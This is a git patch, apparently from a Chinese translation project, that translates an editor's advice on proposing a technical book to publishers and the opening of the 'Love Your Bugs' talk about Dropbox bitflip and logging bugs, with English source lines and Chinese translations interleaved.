+你已经有了一个写一本科技书籍的想法,祝贺你!就像徒步旅行一样,或者是去学做一种甜点心,写一本书就像人们讨论的那些事情中一种,但是却都只停留在思考的初级阶段。 那是可以理解的,因为失败的几率是很高的。要想实现它你需要在把你的想法阐述给出版商,去探讨是否已经准备充分去写成一本书。要去实现这一步是相当困难的,但最困难的是你将缺少足够的资源信息来完成它。如果你想和一个传统的出版商合作,你需要在他们面前推销你的书籍以期望能够得到出版的机会。我是Pragmatci Bookshelf的编辑主管,所以我经常看到很多的提案,也去帮助作者提议更好的主意。 有些是好的,有些则不然,但我经常会看到许多不符合我们出版社风格的文稿。我会帮助你去选择最适合的出版商,来让你的想法得到认可。 ### 鉴别出你的目标 - 你的第一步是要找出最适合你的想法的出版商。你可以从你较喜欢购买的书籍的出版商开始,你的书会被像你自己一样的人喜欢的几率是很高的,所以从你自己最喜欢的开始将会大大缩小你的查搜素范围。如果你自己所买的书籍并不多。你可以去书店逛逛,或者在亚马逊网站上看看。 列一个你自己喜欢的的出版商的清单出来 -Next, winnow your prospects. Although most technical publishers look alike from a distance, they often have -下一步,挑选出你期望的,尽管大多数技术类出版商看起来没什么差别, -distinctive audiences. Some publishers go for broadly popular topics, such as C++ or Java. Your book on Elixir may -他们通常各有不同的读者群体。有些出版商会选择广受欢迎的话题,如C++或者Java. 你以Elixir为主题的就可能不适合那个出版商。 -not be a good fit for that publisher. If your prospective book is about teaching programming to kids, you probably -如果你的书是关于教授小孩学习编程的, -don't want to go with the traditional academic publisher. -你可能就不想让学术出版商来出版。 -Once you've identified a few targets, do some more research into the publishers' catalogs, either on their own -一旦你已经鉴别出一些目标,在他们自己的网站或者亚马逊上对他们进行深一步的调查。 -site, or on Amazon. See what books they have that are similar to your idea. If they have a book that's identical, - 去寻找他们有哪些书籍是和你的思想是相符的。如果他们能有一本和你自己的思想相符合或很相近的书, -or nearly so, you'll have a tough time convincing them to sign yours. That doesn't necessarily mean you should drop -你将会很难说服他们和你签约。但那并不意味着你已经可以把这样的出版商从你的列表中划掉。 -that publisher from your list. You can make some changes to your proposal to differentiate it from the existing -你可以将你的书籍的主题进行适当的修改以将它和已经发行的书区别开来:比如定位于不同的读者群体,或者不同层次的技能水平。也许已发行的那本书已经过时了,你就可以专注于在技术领域的新的方法。确保你的书籍能够弥补现有书的不足,更加完善,而不只是去写完这本书。 -book: target a different audience, or a different skill level. Maybe the existing book is outdated, and you could focus on new approaches to the technology. Make your proposal into a book that complements the existing one, rather than competes. +下一步,挑选出你期望的,尽管大多数技术类出版商看起来没什么差别,他们通常各有不同的读者群体。有些出版商会选择广受欢迎的话题,如C++或者Java. 你以Elixir为主题的就可能不适合那个出版商。如果你的书是关于教授小孩学习编程的,你可能就不想让学术出版商来出版。一旦你已经鉴别出一些目标,在他们自己的网站或者亚马逊上对他们进行深一步的调查。 去寻找他们有哪些书籍是和你的思想是相符的。如果他们能有一本和你自己的思想相符合或很相近的书,你将会很难说服他们和你签约。但那并不意味着你已经可以把这样的出版商从你的列表中划掉。你可以将你的书籍的主题进行适当的修改以将它和已经发行的书区别开来:比如定位于不同的读者群体,或者不同层次的技能水平。也许已发行的那本书已经过时了,你就可以专注于在技术领域的新的方法。确保你的书籍能够弥补现有书的不足,更加完善,而不只是去写完这本书。如果你锁定的出版商没有出版过类似的书籍,也许这将会是个好的机遇,但也许也会很糟糕。有时候一些供应商不会选择去出版一些专业技术方面的书籍,或者是因为他们认为他们的读者不会感兴趣,还可能是因为他们曾经在这块领域遇到过麻烦。新的语言文学或者图书一直在不停的涌现出来,出版商们不得不去琢磨什么样的书籍内容将会吸引他们读者群体。他们的评估标准可能和你的是不以一样的。唯一的途径是通过投稿来试探。 -If your target publisher has no books that are similar, that can be a good sign, or a very bad one. Sometimes -如果你锁定的出版商没有出版过类似的书籍,也许这将会是个好的机遇,但也许也会很糟糕。有时候一些供应商不会选择去出版一些专业技术方面 -publishers choose not to publish on specific technologies, either because they don't believe their audience is -的书籍,或者是因为他们认为他们的读者不会感兴趣,还可能是因为他们曾经在这块领域遇到过麻烦。 -interested, or they've had trouble with that technology in the past. New languages and libraries pop up all the -新的语言文学或者图书一直在不停的涌现出来,出版商们不得不去琢磨什么样的书籍内容将会吸引他们读者群体。 -time, and publishers have to make informed guesses about which will appeal to their readers. Their assessment may - -not be the same as yours. Their decision might be final, or they might be waiting for the right proposal. The only -他们的评估标准可能和你的是不以一样的。唯一的途径是通过投稿来试探。 -way to know is to propose and find out. ### 建立起你自己的网络 - -Identifying a publisher is the first step; now you need to make contact. Unfortunately, publishing is still -鉴别出一家出版商是第一步;现在你首先需要去建立联系。不幸的是,你认识出版商的什么职位的人永远比任何其他的更重要。 -about  _who_  you know, more than  _what_  you know. The person you want to know is an  _acquisitions editor,_  the -你最想认识的那个人是一个去发现新市场,新作者和新提议的组稿编辑。如果你认识某个和出版商有关系的人,请求他帮你介绍认识一位组稿编辑。 -editor whose job is to find new markets, authors, and proposals. If you know someone who has connections with a publisher, ask for an introduction to an acquisitions editor. These editors often specialize in particular subject -这些组稿编辑往往负责一个专题板块,尤其是在较大的出版商,但你不必一定要找到符合你的书的专题板块的编辑。任何板块编辑通常会很乐意将你介绍给符合你的主题的编辑。有时候你也许能够在一个技术论坛展会上发现一个组稿编辑,特别是主办者是出版商,而且还有一个展台, -即使在在当时并没有一个组稿编辑在场,在展台的其他员工也能够帮你和组稿编辑建立联系。 如果这个论坛不符合你的主题思想, 你需要利用你 -的社交网络来获得别人的推荐。使用LinkedIn,或者其他非正式的联系方式,去和一个编辑建立联系。对于小型的出版商,如果你很幸运的话,你可以在他们的公司网站上获得组稿编辑的联系方式。如果找不到联系方式的话,在推特上搜寻出版商的名字,试试能否找到他们的组稿编辑的信息,在社交媒体上去寻找一位陌生的人然后把自己当书推荐给他也许会让你有些紧张担心,但是你真的不必去担心这些,建立联系也是组稿编辑的工作之一 -最坏的结果就是他们忽视你而已。 -一旦你建立起联系,组稿编辑将会协助你进行下一步。他们可能会很快对你的书稿给予反馈,或者在他们考虑你的书之前想让你根据他们的指导来修改你的文章,当你经过努力找到了一名组稿编辑后,多听从他们的建议,因为他们比你更熟悉出版商的运作系统。 +鉴别出一家出版商是第一步;现在你首先需要去建立联系。不幸的是,你认识出版商的什么职位的人永远比任何其他的更重要。你最想认识的那个人是一个去发现新市场,新作者和新提议的组稿编辑。如果你认识某个和出版商有关系的人,请求他帮你介绍认识一位组稿编辑。这些组稿编辑往往负责一个专题板块,尤其是在较大的出版商,但你不必一定要找到符合你的书的专题板块的编辑。任何板块编辑通常会很乐意将你介绍给符合你的主题的编辑。有时候你也许能够在一个技术论坛展会上发现一个组稿编辑,特别是主办者是出版商,而且还有一个展台,即使在在当时并没有一个组稿编辑在场,在展台的其他员工也能够帮你和组稿编辑建立联系。 如果这个论坛不符合你的主题思想, 你需要利用你的社交网络来获得别人的推荐。使用LinkedIn,或者其他非正式的联系方式,去和一个编辑建立联系。对于小型的出版商,如果你很幸运的话,你可以在他们的公司网站上获得组稿编辑的联系方式。如果找不到联系方式的话,在推特上搜寻出版商的名字,试试能否找到他们的组稿编辑的信息,在社交媒体上去寻找一位陌生的人然后把自己当书推荐给他也许会让你有些紧张担心,但是你真的不必去担心这些,建立联系也是组稿编辑的工作之一 +最坏的结果就是他们忽视你而已。 一旦你建立起联系,组稿编辑将会协助你进行下一步。他们可能会很快对你的书稿给予反馈,或者在他们考虑你的书之前想让你根据他们的指导来修改你的文章,当你经过努力找到了一名组稿编辑后,多听从他们的建议,因为他们比你更熟悉出版商的运作系统。 ### 如果其他的方法都失败了 如果你无法找到一名组稿编辑,出版商通常会有一个匿名提案的方式,通常是`proposals@[publisher].com`的格式。 查找他们网站的介绍如何去发送一个匿名提案;有的出版商是有特殊的要求的。遵循他们的要求,如果把你不这样做的话,你的书将会被丢弃不会被任何人阅读。如果你有疑问,或者不确定出版商的意图,你需要再尝试着去找一名组稿编辑进一步的沟通,因为匿名提案并不能得到你想要的答复,整理他们对你的要求(一篇独立的主题文章)发给他们,然后就去期望能够得到满意的答复。 From 415467adf65b715c917af2cd376be5de99e69845 Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Sat, 16 Dec 2017 21:05:41 -0500 Subject: [PATCH 0646/1627] Translated: Love Your Bugs --- sources/tech/20171112 Love Your Bugs.md | 212 +++++++++++------------- 1 file changed, 101 insertions(+), 111 deletions(-) diff --git a/sources/tech/20171112 Love Your Bugs.md b/sources/tech/20171112 Love Your Bugs.md index 0404875a25..9203cf52bb 100644 --- a/sources/tech/20171112 Love Your Bugs.md +++ b/sources/tech/20171112 Love Your Bugs.md @@ -1,21 +1,19 @@ -yixunx translating - -Love Your Bugs +热爱你的 Bug ============================================================ -In early October I gave a keynote at [Python Brasil][1] in Belo Horizonte. Here is an aspirational and lightly edited transcript of the talk. There is also a video available [here][2]. +十月初的时候我在贝洛奥里藏特的[巴西 Python 大会Python Brasil][1]上做了主题演讲。这是稍加改动过的演讲文稿。你可以在[这里][2]观看演讲视频。 -### I love bugs +### 我爱 bug -I’m currently a senior engineer at [Pilot.com][3], working on automating bookkeeping for startups. Before that, I worked for [Dropbox][4] on the desktop client team, and I’ll have a few stories about my work there. Earlier, I was a facilitator at the [Recurse Center][5], a writers retreat for programmers in NYC. I studied astrophysics in college and worked in finance for a few years before becoming an engineer. +我目前是 [Pilot.com][3] 的一位高级工程师,负责给创业公司提供自动记账服务。在此之前,我曾是 [Dropbox][4] 的桌面客户端组的成员,我今天将分享关于我当时工作的一些故事。更早之前,我是 [Recurse Center][5] 的导师,给身在纽约的程序员提供临时的训练环境。在成为工程师之前,我在大学攻读天体物理学并在金融界工作过几年。 -But none of that is really important to remember – the only thing you need to know about me is that I love bugs. I love bugs because they’re entertaining. They’re dramatic. The investigation of a great bug can be full of twists and turns. A great bug is like a good joke or a riddle – you’re expecting one outcome, but the result veers off in another direction. +但这些都不重要——关于我你唯一需要知道的是,我爱 bug。我爱 bug 因为它们有趣。它们富有戏剧性。调试一个好的 bug 的过程可以非常迂回曲折。一个好的 bug 像是一个有趣的笑话或者或者谜语——你期望看到某种结果,但却事与愿违。 -Over the course of this talk I’m going to tell you about some bugs that I have loved, explain why I love bugs so much, and then convince you that you should love bugs too. +在这个演讲中我会给你们讲一些我曾经热爱过的 bug,解释为什么我如此爱 bug,然后说服你们也同样去热爱 bug。 -### Bug #1 +### Bug 1 号 -Ok, straight into bug #1\. This is a bug that I encountered while working at Dropbox. As you may know, Dropbox is a utility that syncs your files from one computer to the cloud and to your other computers. +好,让我们直接来看第一个 bug。这是我在 Dropbox 工作时遇到的一个 bug。你们或许听说过,Dropbox 是一个将你的文件从一个电脑上同步到云端和其他电脑上的应用。 @@ -35,70 +33,62 @@ Ok, straight into bug #1\. This is a bug that I encountered while working at Dro ``` -Here’s a vastly simplified diagram of Dropbox’s architecture. The desktop client runs on your local computer listening for changes in the file system. When it notices a changed file, it reads the file, then hashes the contents in 4MB blocks. These blocks are stored in the backend in a giant key-value store that we call blockserver. The key is the digest of the hashed contents, and the values are the contents themselves. +这是个极度简化的 Dropbox 架构图。桌面客户端在你的电脑本地运行,监听文件系统的变动。当它检测到文件改动时,它读取改变的文件,并把它的内容 hash 成 4 MB 大小的文件块。这些文件块被存放在后端一个叫做块服务器blockserver的巨大的键值对数据库key-value store中。 -Of course, we want to avoid uploading the same block multiple times. You can imagine that if you’re writing a document, you’re probably mostly changing the end – we don’t want to upload the beginning over and over. So before uploading a block to the blockserver the client talks to a different server that’s responsible for managing metadata and permissions, among other things. The client asks metaserver whether it needs the block or has seen it before. The “metaserver” responds with whether or not each block needs to be uploaded. - -So the request and response look roughly like this: The client says, “I have a changed file made up of blocks with hashes `'abcd,deef,efgh'`”. The server responds, “I have those first two, but upload the third.” Then the client sends the block up to the blockserver. +当然,我们想避免多次上传同一个文件块。可以想见,如果你在编写一份文档,你应该大部分时候都在改动文档最底部——我们不想一遍又一遍地上传开头部分。所以在上传文件块到块服务器之前之前,客户端会先和一个负责管理元数据和权限等等的服务器沟通。客户端会询问这个元数据服务器metaserver它是需要这个文件块,还是已经见过这个文件块了。元数据服务器会返回每一个文件块是否需要上传。 +所以这些请求和响应看上去大概是这样:客户端说“我有一个改动过的文件,分为这些文件块,它们的 hash 是 `'abcd,deef,efgh'`。服务器响应说“我有前两块,但需要你上传第三块”。然后客户端会把那个文件块上传到块服务器。 ``` +--------------+ +---------------+ | | | | - | METASERVER | | BLOCKSERVER | + | 元数据服务器 | | 块服务器 | | | | | +-+--+---------+ +---------+-----+ ^ | ^ - | | 'ok, ok, need' | -'abcd,deef,efgh' | | +----------+ | efgh: [contents] + | | '有, 有, 无' | +'abcd,deef,efgh' | | +----------+ | efgh: [内容] | +---> | | | - | | CLIENT +--------+ + | | 客户端 +--------+ +--------+ | +----------+ ``` - - -That’s the setup. So here’s the bug. - - +这是问题的背景。下面是 bug。 ``` +--------------+ | | - | METASERVER | + | 块服务器 | | | +-+--+---------+ ^ | | | '???' 'abcdldeef,efgh' | | +----------+ ^ | +---> | | - ^ | | CLIENT + + ^ | | 客户端 + +--------+ | +----------+ ``` -Sometimes the client would make a weird request: each hash value should have been sixteen characters long, but instead it was thirty-three characters long – twice as many plus one. The server wouldn’t know what to do with this and would throw an exception. We’d see this exception get reported, and we’d go look at the log files from the desktop client, and really weird stuff would be going on – the client’s local database had gotten corrupted, or python would be throwing MemoryErrors, and none of it would make sense. - -If you’ve never seen this problem before, it’s totally mystifying. But once you’d seen it once, you can recognize it every time thereafter. Here’s a hint: the middle character of each 33-character string that we’d often see instead of a comma was `l`. These are the other characters we’d see in the middle position: +有时候客户端会提交一个奇怪的请求:每个 hash 值应该包含 16 个字母,但它却发送了 33 个字母——所需数量的两倍加一。服务器不知道该怎么处理它,于是会抛出一个异常。我们收到这个异常的报告,于是去查看客户端的记录文件,然后会看到非常奇怪的事情——客户端的本地数据库损坏了,或者 python 抛出 MemoryError,没有一个合乎情理的。 +如果你以前没见过这个问题,可能会觉得毫无头绪。但当你见过一次之后,你以后每次看到都能轻松地认出它来。给你一个提示:在那些 33 个字母的字符串中,`l` 经常会代替逗号出现。其他经常出现的字符是: ``` l \x0c < $ ( . - ``` -The ordinal value for an ascii comma – `,` – is 44\. The ordinal value for `l` is 108\. In binary, here’s how those two are represented: +英文逗号的 ASCII 码是44。`l` 的 ASCII 码是 108。它们的二进制表示如下: ``` bin(ord(',')): 0101100 bin(ord('l')): 1101100 ``` -You’ll notice that an `l` is exactly one bit away from a comma. And herein lies your problem: a bitflip. One bit of memory that the desktop client is using has gotten corrupted, and now the desktop client is sending a request to the server that is garbage. - -And here are the other characters we’d frequently see instead of the comma when a different bit had been flipped. - +你会注意到 `l` 和逗号只差了一位。问题就出在这里:发生了位反转。桌面客户端使用的内存中的一位发生了错误,于是客户端开始向服务器发送错误的请求。 +这是其他经常代替逗号出现的字符的 ASCII 码: ``` , : 0101100 @@ -112,176 +102,176 @@ $ : 0100100 ``` -### Bitflips are real! +### 位反转是真的! -I love this bug because it shows that bitflips are a real thing that can happen, not just a theoretical concern. In fact, there are some domains where they’re more common than others. One such domain is if you’re getting requests from users with low-end or old hardware, which is true for a lot of laptops running Dropbox. Another domain with lots of bitflips is outer space – there’s no atmosphere in space to protect your memory from energetic particles and radiation, so bitflips are pretty common. +我爱这个 bug 因为它证明了位反转是可能真实发生的事情,而不只是一个理论上的问题。实际上,它在某些情况下会比平时更容易发生。其中一种情况是用户使用的是低配或者老旧的硬件,而运行 Dropbox 的电脑很多都是这样。另外一种会造成很多位反转的地方是外太空——在太空中没有大气层来保护你的内存不受高能粒子和辐射的影响,所以位反转会十分常见。 -You probably really care about correctness in space – your code might be keeping astronauts alive on the ISS, for example, but even if it’s not mission-critical, it’s hard to do software updates to space. If you really need your application to defend against bitflips, there are a variety of hardware & software approaches you can take, and there’s a [very interesting talk][6] by Katie Betchold about this. +你大概非常在乎在宇宙中运行的程序的正确性——你的代码或许事关国际空间站中宇航员的性命,但即使没有那么重要,也还要考虑到在宇宙中很难进行软件更新。如果你的确需要让你的程序能够处理位反转,有很多硬件和软件措施可供你选择,Katie Betchold 还关于这个问题做过一个[非常有意思的讲座][6]。 -Dropbox in this context doesn’t really need to protect against bitflips. The machine that is corrupting memory is a user’s machine, so we can detect if the bitflip happens to fall in the comma – but if it’s in a different character we don’t necessarily know it, and if the bitflip is in the actual file data read off of disk, then we have no idea. There’s a pretty limited set of places where we could address this, and instead we decide to basically silence the exception and move on. Often this kind of bug resolves after the client restarts. +在刚才那种情况下,Dropbox 并不需要处理位反转。出现内存损坏的是用户的电脑,所以即使我们可以检测到逗号字符的位反转,但如果这发生在其他字符上我们就不一定能检测到了,而且如果从硬盘中读取的文件本身发生了位反转,那我们根本无从得知。我们能改进的地方很少,于是我们决定无视这个异常并继续程序的运行。这种 bug 一般都会在客户端重启之后自动解决。 -### Unlikely bugs aren’t impossible +### 不常见的 bug 并非不可能发生 -This is one of my favorite bugs for a couple of reasons. The first is that it’s a reminder of the difference between unlikely and impossible. At sufficient scale, unlikely events start to happen at a noticable rate. +这是我最喜欢的 bug 之一,有几个原因。第一,它提醒我注意不常见和不可能之间的区别。当规模足够大的时候,不常见的现象会以值得注意的频率发生。 -### Social bugs +### 覆盖面广的 bug -My second favorite thing about this bug is that it’s a tremendously social one. This bug can crop up anywhere that the desktop client talks to the server, which is a lot of different endpoints and components in the system. This meant that a lot of different engineers at Dropbox would see versions of the bug. The first time you see it, you can  _really_  scratch your head, but after that it’s easy to diagnose, and the investigation is really quick: you look at the middle character and see if it’s an `l`. +这个 bug 第二个让我喜欢的地方是它覆盖面非常广。每当桌面客户端和服务器交流的时候,这个 bug 都可能悄然出现,而这可能会发生在系统里很多不同的端点和组件当中。这意味着许多不同的 Dropbox 工程师会看到这个 bug 的各种版本。你第一次看到它的时候,你 _真的_ 会满头雾水,但在那之后诊断这个 bug 就变得很容易了,而调查过程也非常简短:你只需找到中间的字母,看它是不是个 `l`。 -### Cultural differences +### 文化差异 -One interesting side-effect of this bug was that it exposed a cultural difference between the server and client teams. Occasionally this bug would be spotted by a member of the server team and investigated from there. If one of your  _servers_  is flipping bits, that’s probably not random chance – it’s probably memory corruption, and you need to find the affected machine and get it out of the pool as fast as possible or you risk corrupting a lot of user data. That’s an incident, and you need to respond quickly. But if the user’s machine is corrupting data, there’s not a lot you can do. +这个 bug 的一个有趣的副作用是它展示了服务器组和客户端组之间的文化差异。有时候这个 bug 会被服务器组的成员发现并展开调查。如果你的 _服务器_ 上发生了位反转,那应该不是个偶然——这很可能是内存损坏,你需要找到受影响的主机并尽快把它从集群中移除,不然就会有损坏大量用户数据的风险。这是个事故,而你必须迅速做出反应。但如果是用户的电脑在破坏数据,你并没有什么可以做的。 -### Share your bugs +### 分享你的 bug -So if you’re investigating a confusing bug, especially one in a big system, don’t forget to talk to people about it. Maybe your colleagues have seen a bug shaped like this one before. If they have, you might save a lot of time. And if they haven’t, don’t forget to tell people about the solution once you’ve figured it out – write it up or tell the story in your team meeting. Then the next time your teams hits something similar, you’ll all be more prepared. +如果你在调试一个难搞的 bug,特别是在大型系统中,不要忘记跟别人讨论。也许你的同事以前就遇到过类似的 bug。若是如此,你可能会节省很多时间。就算他们没有见过,也不要忘记在你解决了问题之后告诉他们解决方法——写下来或者在组会中分享。这样下次你们组遇到类似的问题时,你们都会早有准备。 -### How bugs can help you learn +### Bug 如何帮助你进步 ### Recurse Center -Before I joined Dropbox, I worked for the Recurse Center. The idea behind RC is that it’s a community of self-directed learners spending time together getting better as programmers. That is the full extent of the structure of RC: there’s no curriculum or assignments or deadlines. The only scoping is a shared goal of getting better as a programmer. We’d see people come to participate in the program who had gotten CS degrees but didn’t feel like they had a solid handle on practical programming, or people who had been writing Java for ten years and wanted to learn Clojure or Haskell, and many other profiles as well. +在加入 Dropbox 之前,我曾在 Recurse Center 工作。它的理念是建立一个社区让正在自学的程序员们聚到一起来提高能力。这就是 Recurse Center 的全部了:我们没有大纲、作业、截止日期等等。唯一的前提条件是我们都想要成为更好的程序员。参与者中有的人有计算机学位但对自己的实际编程能力不够自信,有的人已经写了十年 Java 但想学 Clojure 或者 Haskell,还有各式各样有着其他的背景的参与者。 -My job there was as a facilitator, helping people make the most of the lack of structure and providing guidance based on what we’d learned from earlier participants. So my colleagues and I were very interested in the best techniques for learning for self-motivated adults. +我在那里是一位导师,帮助人们更好地利用这个自由的环境,并参考我们从以前的参与者那里学到的东西来提供指导。所以我的同事们和我本人都非常热衷于寻找对成年自学者最有帮助的学习方法。 -### Deliberate Practice +### 刻意练习 -There’s a lot of different research in this space, and one of the ones I think is most interesting is the idea of deliberate practice. Deliberate practice is an attempt to explain the difference in performance between experts & amateurs. And the guiding principle here is that if you look just at innate characteristics – genetic or otherwise – they don’t go very far towards explaining the difference in performance. So the researchers, originally Ericsson, Krampe, and Tesch-Romer, set out to discover what did explain the difference. And what they settled on was time spent in deliberate practice. +在学习方法这个领域有很多不同的研究,其中我觉得最有意思的研究之一是刻意练习的概念。刻意练习理论意在解释专业人士和业余爱好者的表现的差距。它的基本思想是如果你只看内在的特征——不论先天与否——它们都无法非常好地解释这种差距。于是研究者们,包括最初的 Ericsson、Krampe 和 Tesch-Romer,开始寻找能够解释这种差距的理论。他们最终的答案是在刻意练习上所花的时间。 -Deliberate practice is pretty narrow in their definition: it’s not work for pay, and it’s not playing for fun. You have to be operating on the edge of your ability, doing a project appropriate for your skill level (not so easy that you don’t learn anything and not so hard that you don’t make any progress). You also have to get immediate feedback on whether or not you’ve done the thing correctly. +他们给刻意练习的定义非常精确:不是为了收入而工作,也不是为了乐趣而玩耍。你必须尽自己能力的极限,去做一个和你的水平相称的任务(不能太简单导致你学不到东西,也不能太难导致你无法取得任何进展)。你还需要获得即时的反馈,知道自己是否做得正确。 -This is really exciting, because it’s a framework for how to build expertise. But the challenge is that as programmers this is really hard advice to apply. It’s hard to know whether you’re operating at the edge of your ability. Immediate corrective feedback is very rare – in some cases you’re lucky to get feedback ever, and in other cases maybe it takes months. You can get quick feedback on small things in the REPL and so on, but if you’re making a design decision or picking a technology, you’re not going to get feedback on those things for quite a long time. +这非常令人兴奋,因为这是一套能够用来建立专业技能的系统。但难点在于对于程序员来说这些建议非常难以实施。你很难知道你是否处在自己能力的极限。也很少有即时的反馈帮助你改进——有时候你能得到任何反馈都已经算是很幸运了,还有时候你需要等几个月才能得到反馈。对于在 REPL 中做的简单的事情你可以很快地得到反馈,但如果你在做一个设计上的决定或者技术上的选择,你在很长一段时间里都无法得到反馈。 -But one category of programming where deliberate practice is a useful model is debugging. If you wrote code, then you had a mental model of how it worked when you wrote it. But your code has a bug, so your mental model isn’t quite right. By definition you’re on the boundary of your understanding – so, great! You’re about to learn something new. And if you can reproduce the bug, that’s a rare case where you can get immediate feedback on whether or not your fix is correct. +但是在有一类编程工作中刻意练习是非常有用的,它就是 debug。如果你写了一份代码,那么当时你是理解这份代码是如何工作的。但你的代码有 bug,所以你的理解并不完全正确。根据定义来说,你正处在你理解能力的极限上——这很好!你马上要学到新东西了。如果你可以重现这个 bug,那么这是个宝贵的机会,你可以获得即时的反馈,知道自己的修改是否正确。 -A bug like this might teach you something small about your program, or you might learn something larger about the system your code is running in. Now I’ve got a story for you about a bug like that. +像这样的 bug 也许能让你学到关于你的程序的一些小知识,但你也可能会学到一些关于运行你的代码的系统的一些更复杂的知识。我接下来要讲一个关于这种 bug 的故事。 -### Bug #2 +### Bug 2 号 -This bug also one that I encountered at Dropbox. At the time, I was investigating why some desktop client weren’t sending logs as consistently as we expected. I’d started digging into the client logging system and discovered a bunch of interesting bugs. I’ll tell you only the subset of those bugs that is relevant to this story. +这也是我在 Dropbox 工作时遇到的 bug。当时我正在调查为什么有些桌面客户端没有像我们预期的那样持续发送日志。我开始调查客户端的日志系统并且发现了很多有意思的 bug。我会挑一些跟这个故事有关的 bug 来讲。 -Again here’s a very simplified architecture of the system. +和之前一样,这是一个非常简化的系统架构。 ``` +--------------+ | | - +---+ +----------> | LOG SERVER | - |log| | | | + +---+ +----------> | 日志服务器 | + |日志| | | | +---+ | +------+-------+ | | +-----+----+ | 200 ok | | | - | CLIENT | <-----------+ + | 客户端 | <-----------+ | | +-----+----+ ^ +--------+--------+--------+ | ^ ^ | +--+--+ +--+--+ +--+--+ +--+--+ - | log | | log | | log | | log | + | 日志 | | 日志 | | 日志 | | 日志 | | | | | | | | | | | | | | | | | +-----+ +-----+ +-----+ +-----+ ``` -The desktop client would generate logs. Those logs were compress, encrypted, and written to disk. Then every so often the client would send them up to the server. The client would read a log off of disk and send it to the log server. The server would decrypt it and store it, then respond with a 200. +桌面客户端会生成日志。这些日志会被压缩、加密并写入硬盘。然后客户端会间歇性地把它们发送给服务器。客户端从硬盘读取日志并发送给日志服务器。服务器会将它解码并存储,然后返回 200。 -If the client couldn’t reach the log server, it wouldn’t let the log directory grow unbounded. After a certain point it would start deleting logs to keep the directory under a maximum size. +如果客户端无法连接到日志服务器,它不会让日志目录无限地增长。超过一定大小之后,它会开始删除日志来让目录大小不超过一个最大值。 -The first two bugs were not a big deal on their own. The first one was that the desktop client sent logs up to the server starting with the oldest one instead of starting with the newest. This isn’t really what you want – for example, the server would tell the client to send logs if the client reported an exception, so probably you care about the logs that just happened and not the oldest logs that happen to be on disk. +最初的两个 bug 本身并不严重。第一个 bug 是桌面客户端向服务器发送日志时会从最早的日志而不是最新的日志开始。这并不是很好——比如服务器会在客户端报告异常的时候让客户端发送日志,所以你可能最在乎的是刚刚生成的日志而不是在硬盘上的最早的日志。 -The second bug was similar to the first: if the log directory hit its maximum size, the client would delete the logs starting with the newest instead of starting with the oldest. Again, you lose log files either way, but you probably care less about the older ones. +第二个 bug 和第一个相似:如果日志目录的大小达到了上限,客户端会从最新的日志而不是最早的日志开始删除。同理,你总是会丢失一些日志文件,但你大概更不在乎那些较早的日志。 -The third bug had to do with the encryption. Sometimes, the server would be unable to decrypt a log file. (We generally didn’t figure out why – maybe it was a bitflip.) We weren’t handling this error correctly on the backend, so the server would reply with a 500\. The client would behave reasonably in the face of a 500: it would assume that the server was down. So it would stop sending log files and not try to send up any of the others. +第三个 bug 和加密有关。有时服务器会无法对一个日志文件解码(我们一般不知道为什么——也许发生了位反转)。我们在后端没有正确地处理这个错误,而服务器会返回 500。客户端看到 500 之后会做合理的反应:它会认为服务器停机了。所以它会停止发送日志文件并且不再尝试发送其他的日志。 -Returning a 500 on a corrupted log file is clearly not the right behavior. You could consider returning a 400, since it’s a problem with the client request. But the client also can’t fix the problem – if the log file can’t be decrypted now, we’ll never be able to decrypt it in the future. What you really want the client to do is just delete the log and move on. In fact, that’s the default behavior when the client gets a 200 back from the server for a log file that was successfully stored. So we said, ok – if the log file can’t be decrypted, just return a 200. +对于一个损坏的日志文件返回 500 显然不是正确的行为。你可以考虑返回 400,因为问题出在客户端的请求上。但客户端同样无法修复这个问题——如果日志文件现在无法解码,我们后也永远无法将它解码。客户端正确的做法是直接删除日志文件然后继续运行。实际上,这正是客户端在成功上传日志文件并从服务器收到 200 的响应时的默认行为。所以我们说,好——如果日志文件无法解码,就返回 200。 -All of these bugs were straightforward to fix. The first two bugs were on the client, so we’d fixed them on the alpha build but they hadn’t gone out to the majority of clients. The third bug we fixed on the server and deployed. +所有这些 bug 都很容易修复。前两个 bug 出在客户端上,所以我们在 alpha 版本修复了它们,但大部分的客户端还没有获得这些改动。我们在服务器代码中修复了第三个 bug 并部署了新版的服务器。 ### 📈 -Suddenly traffic to the log cluster spikes. The serving team reaches out to us to ask if we know what’s going on. It takes me a minute to put all the pieces together. +突然日志服务器集群的流量开始激增。客服团队找到我们并问我们是否知道原因。我花了点时间把所有的部分拼到一起。 -Before these fixes, there were four things going on: +在修复之前,这四件事情会发生: -1. Log files were sent up starting with the oldest +1. 日志文件从最早的开始发送 -2. Log files were deleted starting with the newest +2. 日志文件从最新的开始删除 -3. If the server couldn’t decrypt a log file it would 500 +3. 如果服务器无法解码日志文件,它会返回 500 -4. If the client got a 500 it would stop sending logs +4. 如果客户端收到 500,它会停止发送日志 -A client with a corrupted log file would try to send it, the server would 500, the client would give up sending logs. On its next run, it would try to send the same file again, fail again, and give up again. Eventually the log directory would get full, at which point the client would start deleting its newest files, leaving the corrupted one on disk. +一个存有损坏的日志文件的客户端会试着发送这个文件,服务器会返回 500,客户端会放弃发送日志。在下一次运行时,它会尝试再次发送同样的文件,再次失败,并再次放弃。最终日志目录会被填满,然后客户端会开始删除最新的日志文件,而把损坏的文件继续保留在硬盘上。 -The upshot of these three bugs: if a client ever had a corrupted log file, we would never see logs from that client again. +这三个 bug 导致的结果是:如果客户端在任何时候生成了损坏的日志文件,我们就再也不会收到那个客户端的日志了。 -The problem is that there were a lot more clients in this state than we thought. Any client with a single corrupted file had been dammed up from sending logs to the server. Now that dam was cleared, and all of them were sending up the rest of the contents of their log directories. +问题是,处于这种状态的客户端比我们想象的要多很多。任何有一个损坏文件的客户端都会像被关在堤坝里一样,无法再发送日志。现在这个堤坝被清除了,所有这些客户端都开始发送它们的日志目录的剩余内容。 -### Our options +### 我们的选择 -Ok, there’s a huge flood of traffic coming from machines around the world. What can we do? (This is a fun thing about working at a company with Dropbox’s scale, and particularly Dropbox’s scale of desktop clients: you can trigger a self-DDOS very easily.) +好的,现在文件从世界各地的电脑如洪水般涌来。我们能做什么?(当你在一个有 Dropbox 这种规模,尤其是这种桌面客户端的规模的公司工作时,会遇到这种有趣的事情:你可以非常轻易地对自己造成 DDOS 攻击)。 -The first option when you do a deploy and things start going sideways is to rollback. Totally reasonable choice, but in this case, it wouldn’t have helped us. The state that we’d transformed wasn’t the state on the server but the state on the client – we’d deleted those files. Rolling back the server would prevent additional clients from entering this state but it wouldn’t solve the 